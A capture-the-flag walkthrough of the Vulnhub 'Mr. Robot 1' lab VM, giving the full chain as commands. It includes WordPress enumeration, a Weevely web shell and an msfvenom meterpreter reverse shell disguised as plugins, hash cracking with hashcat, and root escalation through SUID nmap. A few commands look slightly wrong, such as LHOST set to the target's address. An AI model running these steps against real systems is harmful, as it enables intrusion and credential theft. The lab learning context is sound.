Today I am taking a look at Vulnhub VM based on the show Mr. Robot. Coincidentally the name of the VM is MR. Robot 1. The goal is to find three keys hidden in different locations. Throughout the game things are getting progressively more difficult as you hunt down the keys. This game is considered beginner-intermediate and you don’t have to do anything hardcore to beat it.
Let’s start, shall we?
Test lab environment
When playing games such as this I use my own test lab. I’ve been using VMWare and Kali Linux for years. Due to hardware and software issues I decided to switch everything out in favor of Virtual Box and Parrot OS. I’ll do the hacking part from Parrot exclusively. I recommend to setup a similar environment before playing.
Finding the most basic information
The very first thing I had to do was to uncover the target IP-address. Luckily my test lab has few machines in it, so finding the target was a breeze using this command:
Finding open ports
I knew very little about this target. A great way to learn more about a target is to have a look at which ports that is in open state using Nmap:
$ nmap -p1-65535 -A -T4 -sS -sU target_ip
Nmap found out that ports 80 and 443 were open.
Investigating the web environment
Still not knowing much about the target I needed to find out more. Better make use of Nikto which is a great tool to learn more about the targets web-environment:
$ nikto -output MrRobot.xml -host target_ip
From Nikto’s output I learnt that:
- WordPress is installed on server
- license.txt is present
- robots.txt is present
- … and it uses Apache web server
Those .txt files looked pretty interesting, so I downloaded them for closer inspection:
$ wget http://target_ip/license.txt $ wget http://target_ip/robots.txt
This file had a Base64 encoded string in it. I quickly decoded it while still in the terminal:
$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode
String decodes to
This file contained two interesting entries. First, the key to level 1. Second, a dictionary of some sort. Downloading them both for later use:
$ wget http://target_ip/fsociety.dic $ wget http://target_ip/key-1-of-3.txt
Key 1 retrieved!
Finding basic information about the WordPress installation using WPScan:
$ wpscan --url target_ip
- robots.txt (which I already had downloaded)
- WordPress version
Trying to enumerate the WordPress users:
$ wpscan --enumerate u[0-10000] --url target_ip
Yielded no results, neither using username
elliot directly (as I found earlier).
Plugins are a great source for finding ways in, often they leak interesting information too. Enumerating lets me find out which plugins the site uses:
$ wpscan --url target_ip --enumerate p
Wpscan spat out plenty of useful information and frankly, I wasn’t in the mood to go any further with this information. Instead I went on to log in with credentials
wp-login – instant success!
Looked around. It’s a plain WordPress installation. Decided to try getting shell. Being closer to core is more interesting.
The first thing that struck me was that a shell made using Weevely would be killer!
$ weevely generate 12345 shelly.php
The plan is to sneak the shell on the server by using the plugin installation tool in WordPress. In order to do so, the shell must be prepped to appear as a proper plugin. Adding WordPress related plugin comments into beginning of shelly.php:
<?php /* Plugin Name: Shelly Plugin URI: http://localhost Description: Bla Bla Bla Author: Pingmoose Version: 1.0.1 Author URI: http://localhost */ ... PHP_SHELL_CODE ... ?>
Making it a plugin package for WordPress’s plugin installation tool by zipping it:
$ zip shelly.zip shelly.php
Then went on to install it as a WordPress plugin installation. After that, connected Weevely to shell:
$ weevely http://target_ip/wp-content/plugins/shelly/shelly.php 12345
While in shell:
$ cd /home $ ls $ cd /home/robot $ ls
This lead to the discovery of key-2-of-3.txt. I couldn’t read it due to missing permission. However, a file named password.raw-md5 in this directory was readable.
The filename clearly stated I had to deal with a MD5 hash. I could have gone lazy using Rainbow Tables on this one, fat chance it has already been cracked. But that would be too easy, wouldn’t it? Instead I chose to crack it using the RockYou wordlist and the magnificent Hashcat tool.
$ cp /usr/share/wordlists/rockyou.txt.gz Hacking/ $ gunzip rockyou.txt.gz $ hashcat -m 0 -a 1 key2passwordhash.txt ~/Hacking/rockyou.txt
Maybe I could
su - robot using this password. Nope, my shell couldn’t handle that … I needed a better one.
Creating a second shell
$ msfvenom -l | grep php
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=target_ip LPORT=7771 -f raw -o meterpreter.php
Added WordPress headers, zipped it and installed it – the same routine as earlier.
Listener setup in Metasploit:
$ msfconsole $ use exploit/multi/handler $ set LHOST my_ip $ set LPORT 7771 $ run
In order to make the shell connect back to my attacking computer I had to manually visit:
Back in Metasploit:
Then spawn a shell so I could do more work (typed directly into Metasploit):
$ python -c 'import pty;pty.spawn("/bin/bash")'
Waited for shell to come alive. Then
$ cd /home/robot $ su - robot (using the password I cracked from the MD5 file) $ cat Key-2-of-3.txt
Still in my spawned shell, I tried to find a way to become ROOT
Finding programs that can be used for escalation
$ find / -perm +6000 2> /dev/null
Found an old version of NMAP. Trying to exploit the interactive part:
$ /usr/local/bin/nmap --interactive $ !sh $ whoami $ cd /root; ls; $ cat Key-3-of-3.txt